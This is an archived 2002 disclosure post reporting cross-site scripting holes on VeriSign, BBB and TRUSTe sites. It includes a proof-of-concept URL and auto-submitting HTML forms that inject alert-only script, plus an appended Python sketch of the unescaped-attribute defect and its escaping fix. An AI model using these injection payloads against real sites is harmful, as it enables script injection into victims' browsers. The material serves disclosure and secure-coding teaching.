CSS (Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org.

From: Liu Die Yu (liudieyuinchinaat_private)
Date: Tue Jul 16 2002 - 00:37:10 PDT


    
    
    ---== *Useful* info==---
    [1].digitalid.verisign.com is the *sign* of VeriSign. Unfortunately, it is CSS vulnerable.
    
    CODE:URL
    https://digitalid.verisign.com/cgi-bin/Xquery.exe?Template=&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=9cef871936b857a17a7d8bb1810ac742"><P STYLE="left:expression(eval('alert(\'boop\')'))">
    
    (Passed using MSIE 5.5)
    
    
    [2].www.bbb.org is the body of BBB. Again, CSS vulnerable.
    
    CODE:.HTM file
    ----------cut-here---------
    <html>
    <body>
    
    <form  NAME="theform" ACTION="http://www.bbb.org/contact/promail.asp" METHOD="POST">
    		<input type="text" name="username" size="10000" Value="&quot;&gt;&lt;SCRIPT&gt;alert(&quot;boop&quot;);&lt;/SCRIPT&gt;">
    	        <input type="submit" value="Submit" name="btnSubmit">&nbsp; <input type="reset" value="Reset" name="btnReset">
    </form>
    &lt;script&gt;
    theform.submit();
    &lt;/script&gt;
    
    </BODY>
    </html>
    ----------cut-here---------
    
    (Passed using MSIE5.5)
    
    [3].www.truste.org is not trustable for CSS at present.
    CODE:.HTML file
    -------Cut-here-----------
    <html>
    <body>
    <form name=theform action="http://www.truste.org/cgi-mojo/mojo.cgi" method=POST>
    <input type="text" name="email" size="12345" value="&quot;&quot;&gt;&gt;&lt;SCRIPT&gt;alert(&quot;boop&quot;);&lt;/SCRIPT&gt;">
    <input type="submit" style='font-size: 12px; font-family:arial,verdana, sans-serif; background-color: #CC9966; color: #000000; font-weight:bold;border-style:groove' value="Signup">
    </form>
    &lt;SCRIPT&gt;
    theform.submit();
    
    &lt;/SCRIPT&gt;
    </body>
    </html>
    -------cut-here----------
    (Passed using MSIE5.5)
    
    [4].Note: for info on CSS, visit cert.org
    
    ---==Contact me==---
    email:LiuDieYuInChinaat_private:)
    I am a student at Xiang Tan University in HN, CN; my handle is Liu Die Yu.
    Glad to be your friend.
    
    ---==fOR FUN==---
    Can anyone send a postcard (NOT A BOMB) to me?
    Postal Address:
    #B102 Xiang Tan Da Xue,411105,Hu Nan,CHINA
    
    ---==Sth serious(but not technical)==---
    It is even hard to imagine that these sites, which are important sites for online business, are CSS vulnerable. I think the security agencies are fooling around.
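
Added example, not part of the original post and not code from any of the sites named: a Python sketch of the server-side defect the three reports point to, assuming the submitted parameter is echoed into a double-quoted HTML attribute (which the leading `">` of each payload suggests). `render_unsafe`, `render_safe` and the helper names are hypothetical; the payloads are the ones quoted in the post.

```python
import html
from html.parser import HTMLParser

# Payloads quoted from the post above (form values shown entity-decoded).
PAYLOADS = [
    '"><SCRIPT>alert("boop");</SCRIPT>',
    '"><P STYLE="left:expression(eval(\'alert(\\\'boop\\\')\'))">',
]

def render_unsafe(value):
    # Hypothetical vulnerable handler: parameter copied into the attribute verbatim.
    return '<input type="text" name="username" value="' + value + '">'

def render_safe(value):
    # Same template with &, <, >, " and ' encoded for a quoted attribute value.
    return ('<input type="text" name="username" value="'
            + html.escape(value, quote=True) + '">')

class TagCollector(HTMLParser):
    """Records every start tag, i.e. the elements a browser would construct."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def breaks_out(markup):
    # The template defines exactly one <input>; any other element was injected.
    tags = parsed_tags(markup)
    return len(tags) != 1 or tags[0][0] != "input"

def reflected_value(markup):
    # The value attribute as the parser sees it after entity decoding.
    return parsed_tags(markup)[0][1].get("value")

if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe:", [t for t, _ in parsed_tags(render_unsafe(payload))])
        print("safe:  ", [t for t, _ in parsed_tags(render_safe(payload))])
```

The encoded output still round-trips to the exact submitted string as an attribute value, which is the same encoding the post's own `.HTM` files use to carry the payload inside their `value="..."` fields.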
    


